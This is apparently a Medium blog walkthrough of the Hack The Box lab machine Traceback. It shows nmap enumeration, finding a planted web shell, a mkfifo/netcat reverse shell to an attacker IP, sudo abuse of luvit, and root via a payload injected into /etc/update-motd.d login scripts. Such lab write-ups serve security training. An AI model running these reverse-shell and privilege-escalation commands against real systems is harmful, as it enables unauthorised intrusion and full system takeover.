HTB Traceback — Walkthrough

ENUMERATION

So let’s start enumeration with nmap scan

$ nmap -A 10.10.10.181
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us

Apache is running on port 80, on visiting there is text on the page saying that there is a backdoor

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -

When I checked the source code there was a comment

<!--Some of the best web shells that you might need ;)-->

It reminds me of the webshells by TheBinitGhimire but for confiming I searched this comment on google and found that the machine creator Xh4H has forked the Web-Shells repository by TheBinitGhimire

I made a list containing the names of all shells

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

And started a directory brute forcing with this list

# dirsearch.py -u http://10.10.10.181 -w list -e /_|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: / | HTTP method: get | Threads: 10 | Wordlist size: 16Error Log: /root/tools/dirsearch/logs/errors-20-04-28_23-54-08.logTarget: http://10.10.10.181[23:54:08] Starting:
[23:54:10] 200 - 1KB - /smevk.php
Task Completed

Initial Shell

Found that smevk.php was deployed there and with default password admin:admin so I logged in and executed command, found out that current user name is webadmin

To get reverse shell, in the execute command form

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f# nc -lvp 443

Privilege Escalation — sysadmin

Inside /home/sysadmin found a note.txt with text

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Then on checking sudo permissions found that we have permission to run a binary without password

(sysadmin) NOPASSWD: /home/sysadmin/luvit

As it is luvit, and there is function to run system command, get sysadmin shell, so I created a lua script and executed it with sudo privileges

$ echo 'os.execute("bash")' > test.lua
$ sudo -u sysadmin /home/sysadmin/luvit test.lua

user.txt = daad8c6ce76b80********ba5b5817e5

Privilege Escalation — root

During enumeration I found that there are some writable files inside /etc/update-motd.d/ directory which is a very good sign, a brief idea about the files is that this files will be executed as root user, when a user login into the system. So if there is a file named test, when a user will login or ssh into the box the following command will run a root

$ /bin/sh test

But the problem is that there is cronjob running which replace the files inside /etc/update-motd.d/ with the same files at another location where the files are not writable, So we need to be quick

Also if we put our reverse shell command at the end of any file it will not be executed because none of the scripts are being executed till the last line, and if we completely overwrite the file with out payload like using > in echo then the file will not be executed

I generated a ssh key with ssh-keygen command in my host machine and then inserted the public key inside the server

# ssh-keygen
# cat id_rsa.pub
//copy the full text
$ echo "
{id_rsa content}" > /home/sysadmin/.ssh/authorized_keys

I wrote my code in /etc/update-motd.d/91-release-upgrade with nano command

after that the file content looks like:

#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f //payload
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

Then I started a nc listener on my end and ssh into the box with the private key generated before

# nc -lvp 443# ssh -i id_rsa sysadmin@10.10.10.181

It needs to be quick otherwise out payload file will be replaced by the cronjob

As I falied many times because nano was taking time in it, so I used sed command to come over this, I used the below command

$ sed "/sh/a rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f" /etc/update-motd.d/91-release-upgrade > /etc/update-motd.d/50-motd-news

one divding it into parts

  • /sh/a is used so that my code will be inserted after it found the sh keyword, that means in the second line of code, after /bin/sh
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f it is reverse shell payload which I am inserting into the code
  • /etc/update-motd.d/91-release-upgrade is one file containing the code
  • /etc/update-motd.d/50-motd-news is another file at same location which will be executed on login, so I overwrite this with the code, because with sed I cannot put the content back in 91-release-upgrade

then ssh into the box and get reverse shell

I also created my python exploit to automate the exploitation, link is here

To get more information about update-motd.d visit here

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to add web push notification to your WordPress site?

Understanding Twelve-Factor Methodology

Managing Terraform States in Remote Locations:

How To Develop and Build Angular App With Java Backend

How to Deploy a Web App to GCP App Engine

🏦 第20週 — 自動化獲利與自動執行銀行

Continuous Integration and Automated Analytics Test Pipelines using dbt and dbtCloud

Scanner Class Java:

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

Crodo.io — New IDO site on the Cronos network! Part 2

Opan’s ESP32 Project, Archive 4: External Sensor

CRODO.io — platform IDO. Part 4.

CS371p Spring 2022 Blog # 5: Jeffrey Liu